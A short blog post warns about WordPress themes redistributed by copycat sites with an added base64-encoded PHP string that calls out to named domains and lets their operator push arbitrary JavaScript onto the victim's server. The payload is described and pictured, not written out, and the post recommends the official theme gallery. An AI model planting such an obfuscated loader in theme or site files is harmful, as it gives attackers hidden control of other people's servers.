Vicious WordPress Designs

Wow. This was a new one in my world. Just read the article at gigaom.com about how innocent looking WordPress themes sometimes carry a nasty payload opening the door for the evil designer to upload any kind of code to the victims WordPress server. Scary indeed, but a very well written article.

Allow me to quote their example…

Seattle-based designer Derek Punsalan makes acclaimed WordPress themes, and has released several of them to the world. Other theme sites have copied his themes. One such theme copier is WP-Sphere.

When you download Punsalan’s theme from the WP-Sphere site, it contains some extra code that he didn’t include. It’s a long string of cryptic-looking characters that most users wouldn’t question:

Hexcode example of exploit for WordPress theme

The first part of the string offers a clue: It’s using a PHP function to decode the string of text, which is encoded as base64. If we pass this through a decoder, the string looks a lot more malicious:

Detailed example of the payload after decryption

The code establishes a connection from the WordPress server to several sites wpssr.com, wpsnc.com, and wpsnc2.com, and allows the site operator to download an arbitrary piece of Javascript. The sites are registered to an anonymous registrar in Vancouver, British Columbia.

Any advice?

Well, fear not. Unless you insist on very special Site designs, you can get a truckload through the official WordPress Theme Gallery and if you are into customizing anything, you will probably be able to look out for strange encoding strings in the pages delivered as part of a new theme package.

The online society is becoming just like the real world – there are a lot of bad people out there, so watch yourself. A new visitor in town would never take the dark alleys either.

Maybe somebody should maintain a list of criminals though – i.e. theme sites hosting the malware infected themes. At least we would then have some kind of warning … there is no such thing as efficient online police to call upon.